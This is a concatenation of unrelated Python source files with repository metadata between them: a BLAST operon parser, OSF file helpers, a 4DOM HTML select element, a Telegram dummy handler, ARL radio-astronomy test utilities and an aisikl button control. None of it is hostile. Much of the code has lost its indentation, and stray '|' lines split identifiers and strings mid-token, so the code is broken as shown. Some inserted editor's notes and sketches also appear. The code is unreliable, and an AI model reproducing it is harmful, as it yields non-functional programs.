num_proc = 1
else:
num_proc = int(parsed_args.num_proc)
    if parsed_args.max_intergenic_gap < 1:
        max_intergenic_gap = 1
    else:
        max_intergenic_gap = int(parsed_args.max_intergenic_gap)
return infolder, outfolder, operon_query, filter_file, num_proc, operon_query, max_intergenic_gap
#this function will return all of the files that are in a directory. os.walk is recursive traversal.
def returnRecursiveDirFiles(root_dir):
result = []
for path, dir_name, flist in os.walk(root_dir):
for f in flist:
fname = os.path.join(path, f)
if os.path.isfile(fname):
result.append(fname)
return result
# this function will return a dictionary keyed off the operon name, whose values are
# lists of homologous genes, e.g. [abcA, abcB]
def return_self_homolog_dict(operon_list = 'operon_name_and_genes.txt', prot_file = 'operon_protein_query.fa', rna_file = 'operon_rna_query.fa'):
# makes a dictionary keyed by operon name and a list of the gene contained by the operon
operon_dict = {}
for line in [i.strip() for i in open(operon_list).readlines()]:
tmp = line.split('\t')
operon_dict.update({tmp[0]:tmp[1:]})
# set up databases for the different types of genes
# for proteins -p must be set to true
cmd = "formatdb -i %s -p T -o F" % (prot_file)
os.system(cmd)
# for RNA genes -p must be set to false
#cmd = "formatdb -i %s -p F -o F" % (rna_file)
#os.system(cmd)
# blast each set of genes against itself
'''cmd = "blastall -p blastp -a %i -i %s -d %s -e %s -o %s -m 9" % (os.sysconf("SC_NPROCESSORS_ONLN"), prot_file, prot_file, '1e-10', 'self_prot.txt')
os.system( cmd )'''
cmd = "blastall -p blastp -a %i -i %s -d %s -e %s -o %s -m 8" % (os.sysconf("SC_NPROCESSORS_ONLN"), prot_file, prot_file, '1e-10', 'self_prot.txt')
os.system( cmd )
#cmd = "blastall -p blastn -a %i -i %s -d %s -e %s -o %s -m 9" % (os.sysconf("SC_NPROCESSORS_ONLN"), rna_file, rna_file, '1e-10', 'self_rna.txt')
#os.system( cmd )
# in this next section i will read in the resulting blast results, and construct a dictionary which will be keyed off gene name and provide a list
# of homologs from the operon set. This list will allow the program to filter out spurious results. We will miss fusions of homologous genes, but
# hopefully this will be a rare event in our dataset, until this can be revised
lst = [i.strip() for i in open('self_prot.txt').readlines() if i[0] != '#']
#for line in [i.strip() for i in open('self_rna.txt').readlines() if i[0] != '#']:
# lst.append(line)
result = {}
print "got here 1"
for line in lst:
source, hit = line.split('\t')[0:2]
source_annotation = source.split('|')[2]
hit_annotation = hit.split('|')[2]
# we have two genes in the test set that are homologous
if source_annotation != hit_annotation:
            if source_annotation not in result:
result.update({source_annotation: [hit_annotation]})
else:
result[source_annotation].append(hit_annotation)
print "got here 2"
return result
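# Editor's note: illustrative shape of the mapping returned above (gene names are
# hypothetical): {'abcA': ['abcB'], 'abcB': ['abcA']} -- each annotation maps to
# the other operon genes it hit in the self-BLAST.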
# The purpose of this function is to filter out the spurious hits on a locus, and determine the annotation of the gene at
# that position. To do this the program will make a dict keyed by [locus/start] and then determine the annotations that
# exist for it. If there are two annotations that have homologous genes then the best hit will be used. If there are two
# annotations for a locus which are not homologous then some sort of hit analysis will be performed to determine if there
# is a good candidate for a gene fusion. (should look at papers on this). When done the function will report a list of
# homologs that are ordered by start position which have been filtered for the best hit, or as a fusion.
def filter_locus_hits(h_list, self_homolog_dict):
pass
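# Editor's note (hedged sketch, not the original implementation): filter_locus_hits
# above is an unimplemented stub. The sketch below is one possible reading of the
# comment, assuming h_list holds BLAST -m 8 tab-separated rows (query, subject, ...,
# s.start at index 8, bitscore at index 11) and that query headers carry the
# annotation in '|' field 2, as in return_self_homolog_dict above.
def filter_locus_hits_sketch(h_list, self_homolog_dict):
    best = {}  # (locus, start) -> (bitscore, annotation)
    for row in h_list:
        fields = row.split('\t')
        annotation = fields[0].split('|')[2]
        key = (fields[1], int(fields[8]))  # subject locus and subject start
        score = float(fields[11])
        if key not in best:
            best[key] = (score, annotation)
        else:
            prev_score, prev_annotation = best[key]
            # homologous competitors: keep the better bitscore. Non-homologous
            # competitors would need a fusion analysis, which is not attempted here.
            if annotation in self_homolog_dict.get(prev_annotation, []) and score > prev_score:
                best[key] = (score, annotation)
    # report the surviving annotations ordered by start position
    return [ann for ((locus, start), (score, ann)) in sorted(best.items(), key=lambda item: item[0][1])]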
def main():
start = time.time()
print time.time() - start
# ./blast_parse.py -f phylo_order.txt
if __name__ == '__main__':
main()
|
arpitar/osf.io
|
website/files/utils.py
|
Python
|
apache-2.0
| 3,388
| 0.000885
|
from modularodm.exceptions import ValidationValueError
def copy_files(src, target_node, parent=None, name=None):
"""Copy the files from src to the target node
:param Folder src: The source to copy children from
:param Node target_node: The node settings of the project to copy files to
:param Folder parent: The parent of to attach the clone of src to, if applicable
"""
assert not parent or not parent.is_file, 'Parent must be a folder'
cloned = src.clone().wrapped()
cloned.parent = parent
cloned.node = target_node
cloned.name = name or cloned.name
if src.is_file:
cloned.versions = src.versions
cloned.save()
if not src.is_file:
for child in src.children:
copy_files(child, target_node, parent=cloned)
return cloned
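# Editor's note: hedged usage sketch; src_folder and target (a Folder and a Node)
# are hypothetical stand-ins, since real OSF model objects are needed here:
#   cloned_root = copy_files(src_folder, target)                  # copy whole tree
#   renamed = copy_files(src_folder, target, name='data (copy)')  # copy under a new name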
class GenWrapper(object):
"""A Wrapper for MongoQuerySets
Overrides __iter__ so for loops will always
return wrapped objects.
All other methods are proxied to the underlying QuerySet
"""
    def __init__(self, mqs):
self.mqs = mqs
def __iter__(self):
"""Return
|
s a generator that wraps all StoredFileNodes
returned from self.mqs
"""
return (x.wrapped() for x in self.mqs)
def __repr__(self):
return '<website.files.utils.GenWrapper({!r})>'.format(self.mqs)
def __getitem__(self, x):
"""__getitem__ does not default to __getattr__
        so it must be explicitly overridden
"""
return self.mqs[x].wrapped()
def __len__(self):
"""__len__ does not default to __getattr__
        so it must be explicitly overridden
"""
return len(self.mqs)
def __getattr__(self, name):
if 'mqs' in self.__dict__:
try:
return getattr(self.mqs, name)
except AttributeError:
pass # Avoids error message about the underlying object
return object.__getattribute__(self, name)
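# Editor's note: illustrative sketch (not part of the original module) showing how
# GenWrapper proxies iteration, indexing and len() through to wrapped() results,
# using a plain list with stub nodes in place of a real MongoQuerySet.
def _genwrapper_demo():
    class FakeNode(object):
        def __init__(self, name):
            self.name = name
        def wrapped(self):
            return 'wrapped:' + self.name
    demo = GenWrapper([FakeNode('a'), FakeNode('b')])
    assert list(demo) == ['wrapped:a', 'wrapped:b']  # __iter__ wraps each item
    assert demo[0] == 'wrapped:a'                    # __getitem__ wraps too
    assert len(demo) == 2                            # __len__ proxies through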
def validate_location(value):
if value is None:
return # Allow for None locations but not broken dicts
from website.addons.osfstorage import settings
for key in ('service', settings.WATERBUTLER_RESOURCE, 'object'):
if key not in value:
raise ValidationValueError('Location {} missing key "{}"'.format(value, key))
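# Editor's note: a location that would pass validation, assuming (hypothetically)
# that settings.WATERBUTLER_RESOURCE is 'bucket':
#   validate_location({'service': 'cloud', 'bucket': 'osf-files', 'object': 'abc123'})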
def insort(col, element, get=lambda x: x):
"""Python's bisect does not allow for a get/key
so it can not be used on a list of dictionaries.
Inserts element into the sorted collection col via
a binary search.
if element is not directly compairable the kwarg get may
be a callable that transforms element into a compairable object.
ie: A lambda that returns a certain key of a dict or attribute of an object
:param list col: The collection to insort into
:param ? element: The Element to be insortted into col
:param callable get: A callable that take a type of element and returns a compairable
"""
if not col:
# If collection is empty go ahead and insert at the first position
col.insert(0, element)
return col
lo, hi = 0, len(col)
# Binary search for the correct position
while lo < hi:
mid = int((hi + lo) / 2)
if get(col[mid]) > get(element):
hi = mid
else:
lo = mid + 1
col.insert(lo, element)
return col
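# Editor's note: illustrative use of insort's `get` kwarg (example data is made up),
# keeping a list of dicts sorted by their 'size' key via the binary search above.
def _insort_demo():
    sizes = [{'size': 1}, {'size': 3}, {'size': 8}]
    insort(sizes, {'size': 5}, get=lambda d: d['size'])
    assert [d['size'] for d in sizes] == [1, 3, 5, 8]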
|
alanjw/GreenOpenERP-Win-X86
|
python/Lib/site-packages/_xmlplus/dom/html/HTMLSelectElement.py
|
Python
|
agpl-3.0
| 4,750
| 0.008421
|
########################################################################
#
# File Name: HTMLSelectElement.py
#
#
"""
WWW: http://4suite.com/4DOM e-mail: support@4suite.com
Copyright (c) 2000 Fourthought Inc, USA. All Rights Reserved.
See http://4suite.com/COPYRIGHT for license and copyright information
"""
from xml.dom import implementation
from xml.dom import IndexSizeErr
from xml.dom.html.HTMLElement import HTMLElement
import string
class HTMLSelectElement(HTMLElement):
def __init__(self, ownerDocument, nodeName='SELECT'):
HTMLElement.__init__(self, ownerDocument, nodeName)
def _get_type(self):
if self._get_multiple():
return 'select-multiple'
return 'select-one'
def _get_selectedIndex(self):
options = self._get_options()
for ctr in range(len(options)):
node = options.item(ctr)
if node._get_selected() == 1:
return ctr
return -1
def _set_selectedIndex(self,index):
options = self._get_options()
        if index < 0 or index >= len(options):
raise IndexSizeErr()
for ctr in range(len(options)):
node = options.item(ctr)
if ctr == index:
node._set_selected(1)
else:
node._set_selected(0)
def _get_value(self):
options = self._get_options()
node = options.item(self._get_selectedIndex())
if node.hasAttribute('VALUE'):
value = node.getAttribute('VALUE')
elif node.firstChild:
value = node.firstChild.data
else:
value = ''
return value
def _set_value(self,value):
# This doesn't seem to do anything in browsers
pass
def _get_length(self):
return self._get_options()._get_length()
def _get_options(self):
children = self.getElementsByTagName('OPTION')
return implementation._4dom_createHTMLCollection(children)
def _get_disabled(self):
if self.getAttributeNode('DISABLED'):
return 1
return 0
def _set_disabled(self,disabled):
if disabled:
self.setAttribute('DISABLED', 'DISABLED')
else:
self.removeAttribute('DISABLED')
def _get_multiple(self):
if self.getAttributeNode('MULTIPLE'):
return 1
return 0
def _set_multiple(self,mult):
if mult:
self.setAttribute('MULTIPLE', 'MULTIPLE')
else:
self.removeAttribute('MULTIPLE')
def _get_name(self):
return self.getAttribute('NAME')
def _set_name(self,name):
self.setAttribute('NAME',name)
def _get_size(self):
rt = self.getAttribute('SIZE')
        if rt is not None:
return string.atoi(rt)
return -1
def _set_size(self,size):
self.setAttribute('SIZE',str(size))
def _get_tabIndex(self):
return string.atoi(self.getAttribute('TABINDEX'))
def _set_tabIndex(self,tabindex):
self.setAttribute('TABINDEX',str(tabindex))
def add(self,newElement,beforeElement):
self.insertBefore(newElement,beforeElement)
def remove(self,index):
        if index < 0 or index >= self._get_length():
return
hc = self._get_options()
node = hc.item(index)
self.removeChild(node)
def _get_form(self):
parent = self.parentNode
while parent:
if parent.nodeName == "FORM":
return parent
parent = parent.parentNode
return None
### Attribute Access Mappings ###
_readComputedAttrs = HTMLElement._readComputedAttrs.copy()
_readComputedAttrs.update ({
'type' : _get_type,
'length' : _get_length,
'options' : _get_options,
'form' : _get_form,
'selectedIndex' : _get_selectedIndex,
'value' : _get_value,
'disabled' : _get_disabled,
'multiple' : _get_multiple,
'name' : _get_name,
'size' : _get_size,
'tabIndex' : _get_tabIndex,
})
_writeComputedAttrs = HTMLElement._writeComputedAttrs.copy()
_writeComputedAttrs.update ({
'selectedIndex' : _set_selectedIndex,
'value' : _set_value,
'disabled' : _set_disabled,
'multiple' : _set_multiple,
'name' : _set_name,
'size' : _set_size,
'tabIndex' : _set_tabIndex,
})
_readOnlyAttrs = filter(lambda k,m=_writeComputedAttrs: not m.has_key(k),
HTMLElement._readOnlyAttrs + _readComputedAttrs.keys())
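# Editor's note: hedged usage sketch; `doc` stands in for a 4DOM HTML document,
# which is not constructed here. Only methods defined above are used:
#   sel = HTMLSelectElement(doc)       # nodeName defaults to 'SELECT'
#   sel._set_multiple(1)               # sets the MULTIPLE attribute
#   sel._get_type()                    # -> 'select-multiple'
#   sel._set_name('choices')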
|
aquametalabs/django-telegram
|
telegram/handlers/dummy.py
|
Python
|
bsd-3-clause
| 387
| 0
|
from telegram.handlers.base import BasePlatformHandler
class DummyHandler(BasePlatformHandler):
def handle(self):
print 'Channel: %s' % self.telegram.channel.name
print 'Subject: %s' % self.telegram.subject
print 'Message: %s' % self.telegram.content
        print 'Level: %s' % self.subscription.get_level_display()
print 'Extra: %s' % self.extra
|
SKA-ScienceDataProcessor/algorithm-reference-library
|
processing_components/simulation/testing_support.py
|
Python
|
apache-2.0
| 47,842
| 0.007504
|
"""
Functions that aid testing in various ways. A typical use would be::
lowcore = create_named_configuration('LOWBD2-CORE')
times = numpy.linspace(-3, +3, 13) * (numpy.pi / 12.0)
frequency = numpy.array([1e8])
channel_bandwidth = numpy.array([1e7])
# Define the component and give it some polarisation and spectral behaviour
f = numpy.array([100.0])
flux = numpy.array([f])
phasecentre = SkyCoord(ra=+15.0 * u.deg, dec=-35.0 * u.deg, frame='icrs', equinox='J2000')
compabsdirection = SkyCoord(ra=17.0 * u.deg, dec=-36.5 * u.deg, frame='icrs', equinox='J2000')
comp = create_skycomponent(flux=flux, frequency=frequency, direction=compabsdirection,
polarisation_frame=PolarisationFrame('stokesI'))
image = create_test_image(frequency=frequency, phasecentre=phasecentre,
cellsize=0.001,
                              polarisation_frame=PolarisationFrame('stokesI'))
vis = create_visibility(lowcore, times=times, frequency=frequency,
channel_bandwidth=channel_bandwidth,
phasecentre=phasecentre, weight=1,
polarisation_frame=PolarisationFrame('stokesI'),
integration_time=1.0)
"""
import csv
import logging
from typing import List
import astropy.units as u
import numpy
from astropy.coordinates import SkyCoord
from astropy.io import fits
from astropy.wcs import WCS
from astropy.wcs.utils import pixel_to_skycoord
from scipy import interpolate
from data_models.memory_data_models import Configuration, Image, GainTable, Skycomponent, SkyModel, PointingTable
from data_models.parameters import arl_path
from data_models.polarisation import PolarisationFrame
from processing_components.calibration.calibration_control import create_calibration_controls
from processing_components.calibration.operations import create_gaintable_from_blockvisibility, apply_gaintable
from processing_components.image.operations import import_image_from_fits
from processing_components.imaging.base import predict_2d, predict_skycomponent_visibility, \
create_image_from_visibility, advise_wide_field
from processing_components.imaging.primary_beams import create_pb
from processing_components.skycomponent.operations import create_skycomponent, insert_skycomponent, \
apply_beam_to_skycomponent, filter_skycomponents_by_flux
from processing_components.visibility.base import create_blockvisibility, create_visibility
from processing_components.visibility.coalesce import convert_blockvisibility_to_visibility, \
convert_visibility_to_blockvisibility
from processing_library.image.operations import create_image_from_array
log = logging.getLogger(__name__)
def create_test_image(canonical=True, cellsize=None, frequency=None, channel_bandwidth=None,
phasecentre=None, polarisation_frame=PolarisationFrame("stokesI")) -> Image:
"""Create a useful test image
    This is the test image M31 widely used in ALMA and other simulations. It is actually part of an H-alpha region in
M31.
:param canonical: Make the image into a 4 dimensional image
    :param cellsize: Cell size in radians
:param frequency: Frequency (array) in Hz
    :param channel_bandwidth: Channel bandwidth (array) in Hz
:param phasecentre: Phase centre of image (SkyCoord)
:param polarisation_frame: Polarisation frame
:return: Image
"""
if frequency is None:
frequency = [1e8]
im = import_image_from_fits(arl_path("data/models/M31.MOD"))
if canonical:
if polarisation_frame is None:
im.polarisation_frame = PolarisationFrame("stokesI"
|
)
elif isinstance(polarisation_frame, PolarisationFrame):
im.polarisation_frame = polarisation_frame
else:
raise ValueError("polarisation_frame is not valid")
im = replicate_image(im, frequency=frequency, polarisation_frame=im.polarisation_frame)
if cellsize is not None:
im.wcs.wcs.cdelt[0] = -180.0 * cellsize / numpy.pi
im.wcs.wcs.cdelt[1] = +180.0 * cellsize / numpy.pi
if frequency is not None:
im.wcs.wcs.crval[3] = frequency[0]
if channel_bandwidth is not None:
im.wcs.wcs.cdelt[3] = channel_bandwidth[0]
else:
if len(frequency) > 1:
im.wcs.wcs.cdelt[3] = frequency[1] - frequency[0]
else:
im.wcs.wcs.cdelt[3] = 0.001 * frequency[0]
im.wcs.wcs.radesys = 'ICRS'
im.wcs.wcs.equinox = 2000.00
if phasecentre is not None:
im.wcs.wcs.crval[0] = phasecentre.ra.deg
im.wcs.wcs.crval[1] = phasecentre.dec.deg
# WCS is 1 relative
im.wcs.wcs.crpix[0] = im.data.shape[3] // 2 + 1
im.wcs.wcs.crpix[1] = im.data.shape[2] // 2 + 1
return im
def create_test_image_from_s3(npixel=16384, polarisation_frame=PolarisationFrame("stokesI"), cellsize=0.000015,
frequency=numpy.array([1e8]), channel_bandwidth=numpy.array([1e6]),
phasecentre=None, fov=20, flux_limit=1e-3) -> Image:
"""Create MID test image from S3
The input catalog was generated at http://s-cubed.physics.ox.ac.uk/s3_sex using the following query::
Database: s3_sex
SQL: select * from Galaxies where (pow(10,itot_151)*1000 > 1.0) and (right_ascension between -5 and 5) and (declination between -5 and 5);;
Number of rows returned: 29966
For frequencies < 610MHz, there are three tables to use::
data/models/S3_151MHz_10deg.csv, use fov=10
data/models/S3_151MHz_20deg.csv, use fov=20
data/models/S3_151MHz_40deg.csv, use fov=40
    For frequencies > 610MHz, there are four tables::
data/models/S3_1400MHz_1mJy_10deg.csv, use flux_limit>= 1e-3
data/models/S3_1400MHz_100uJy_10deg.csv, use flux_limit < 1e-3
data/models/S3_1400MHz_1mJy_18deg.csv, use flux_limit>= 1e-3
data/models/S3_1400MHz_100uJy_18deg.csv, use flux_limit < 1e-3
The component spectral index is calculated from the 610MHz and 151MHz or 1400MHz and 610MHz, and then calculated
for the specified frequencies.
    If polarisation_frame is not stokesI then the image will have a polarised axis but the values will be zero.
:param npixel: Number of pixels
:param polarisation_frame: Polarisation frame (default PolarisationFrame("stokesI"))
:param cellsize: cellsize in radians
    :param frequency: Frequencies (array) in Hz
:param channel_bandwidth: Channel width (Hz)
:param phasecentre: phasecentre (SkyCoord)
:param fov: fov 10 | 20 | 40
:param flux_limit: Minimum flux (Jy)
:return: Image
"""
ras = []
decs = []
fluxes = []
if phasecentre is None:
phasecentre = SkyCoord(ra=+180.0 * u.deg, dec=-60.0 * u.deg, frame='icrs', equinox='J2000')
if polarisation_frame is None:
polarisation_frame = PolarisationFrame("stokesI")
npol = polarisation_frame.npol
nchan = len(frequency)
shape = [nchan, npol, npixel, npixel]
w = WCS(naxis=4)
# The negation in the longitude is needed by definition of RA, DEC
w.wcs.cdelt = [-cellsize * 180.0 / numpy.pi, cellsize * 180.0 / numpy.pi, 1.0, channel_bandwidth[0]]
w.wcs.crpix = [npixel // 2 + 1, npixel // 2 + 1, 1.0, 1.0]
w.wcs.ctype = ["RA---SIN", "DEC--SIN", 'STOKES', 'FREQ']
w.wcs.crval = [phasecentre.ra.deg, phasecentre.dec.deg, 1.0, frequency[0]]
w.naxis = 4
w.wcs.radesys = 'ICRS'
w.wcs.equinox = 2000.0
model = create_image_from_array(numpy.zeros(shape), w, polarisation_frame=polarisation_frame)
if numpy.max(frequency) > 6.1E8:
if fov > 10:
fovstr = '18'
else:
fovstr = '10'
if flux_limit >= 1e-3:
csvfilename = arl_path('data/models/S3_1400MHz_1mJy_%sdeg.csv' % fovstr)
else:
|
fmfi-svt/votr
|
aisikl/components/button.py
|
Python
|
apache-2.0
| 1,203
| 0.002494
|
from aisikl.events import action_event
from .actionablecontrol import ActionableControl
class Button(ActionableControl):
def __init__(self, dialog, id, type, parent_id, properties, element):
super().__init__(dialog, id, type, parent_id, properties, element)
self.image = properties.get('img')
self.confirm_question = element.get('confirmquestion')
self.access_key = element.get('accesskey')
if isinstance(self.access_key, list):
            self.access_key = ' '.join(self.access_key)  # BeautifulSoup :(
def _ais_setAccessKey(self, value):
self.access_key = value
def _ais_setImage(self, value):
self.image = value
def _ais_setConfirmQuestion(self, value):
self.confirm_question = value
def click(self):
self.log('action', 'Clicking {}'.format(self.id))
if self.try_execute_action(): return
ev = action_event(self, None, self.id)
# TODO: We should technically ask confirm_question before firing
# (if ev.listening is True), but we probably don't care.
self.dialog.app.send_events(ev)
# Note that showPopupMenus() is unsupported. Use menu items directly.
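# Editor's note: hedged usage sketch; how a Button instance is obtained from a
# dialog is not shown in this file, so `btn` is hypothetical:
#   btn.click()   # logs the action and sends an action_event to the app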
|